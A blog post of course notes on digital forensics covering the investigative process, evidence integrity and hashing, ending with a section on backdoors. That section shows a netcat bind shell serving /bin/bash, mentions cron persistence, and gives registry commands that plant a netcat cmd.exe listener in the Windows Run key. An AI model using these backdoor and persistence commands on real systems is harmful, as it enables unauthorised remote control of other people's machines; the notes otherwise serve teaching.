9 April 2016


by mo

Notes from CPNT-250 course at SAIT.

The use of scientifically derived and proven methods toward the preservation, collection, validation, identification, analysis, interpretation, documentation and presentation of digital evidence for the purpose of facilitating or furthering the reconstruction of events found to be criminal, or helping to anticipate unauthorized actions shown to be disruptive to planned operation… - (2001) Digital Forensic Research Workshop (DFRWS)

Digital archaeology is about the direct effects from user activity, such as file contents, file access time stamps, information from deleted files, and network flow logs. … Digital geology is about autonomous processes that users have no direct control over, such as the allocation and recycling of disk blocks, file ID numbers, memory pages or process ID number…

  • Digital Forensics with Open Source Tools

Traces left behind due to event are known as ‘artifacts’.

The digital Forensics Process:

Acquisition -> Analysis -> Presentation


Collection of digital media to be examined:

  • disk image
  • email messages
  • cell phones
  • digital photos
  • network devices
  • text messages and chat rooms


  • Identification: locating items present on media, and reducing to artifacts of interest.
  • Analysis: system analysis, file content examination, log analysis, statistical analysis.
  • Interpretation: interpret results of this analysis based on training, expertise, experimentation and experience.


Process which shares results of the analysis phase with interested parties.


  1. Preserve volatile data.
  2. Inspect network activity.
  3. Collect clipboard data.
  4. Collect process information.
  5. Identify users.
  6. Process to executable mapping.
  7. Correlate open ports with processes.
  8. Collect system details.
  9. Identify services and drivers.
  10. Determine scheduled tasks.
  11. Non-volatile data collection from live system.
  12. Forensic duplication/preservation of media.

Elements of a good process

  • Cross-validation of findings: rely on more than one tool to back up your findings.
  • Flexibility: Must be able to cope with change.
  • Legal compliance: Ensure process conforms to the law.
  • Completeness of investigation: must prove search for evidence was complete.
  • Definition of process: You must be able to retrace your steps.
  • Technical Competency: Must have a complete technical understanding of what you do.
  • Management of archives: must be able to retrace steps months or years after investigation.
  • Proper evidence handling: must be aware of chain of custody.


  • Any information that proves something of helps to prove something relevant to the case.
  • Any probative information stored of transmitted in digital form.
  • Disk image is a copy of the original, generally collected by a tool that performs bit-level copying from one location to another. Includes hard drive, memory, removable media.
  • Have a witness who has personal knowledge as to the origins of that piece of evidence to provide testimony.
  • Ensure that evidence has not been changed.
  • Enforce evidence integrity with:
    • bit-image copies
    • physical
    • use cryptographic hashes to ensure integrity of original evidence and copies.
  • Hash value should be generated for every file that contributes to the case, when the evidence is collected.


  • Takes input message of arbitrary length and outputs fixed length code.
  • Good algorithm:
    • Irreversible
    • Low collision


$ md5sum favicon.ico 
4a7edeeac75a39d6d0a7a3bf7f73e22f  favicon.ico


Is a hidden process that runs on target machine and allows a normally unauthorized user to control the computer. It allows you to return to the target machine at any time.

One of the first tasks to complete upon gaining access to a system is to migrate your shell to a more permanent home.


Netcat can be used to function as either a client or server. As a client, it can be used to make a network connection to another service. As a server, it acts as a listener and waits to accept incoming connections.

Start server:

$ nc -l -p 3335 -e /bin/bash

Connect as client:

$ telnet localhost 3335

On unix based systems you can add a cron to restart a persistent backdoor.

On windows systems you can modify the registry to start the backdoor.

  > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
  > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d'C:\windows\system32\nc.exe -Ldp 3333 -e cmd.exe'
  > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc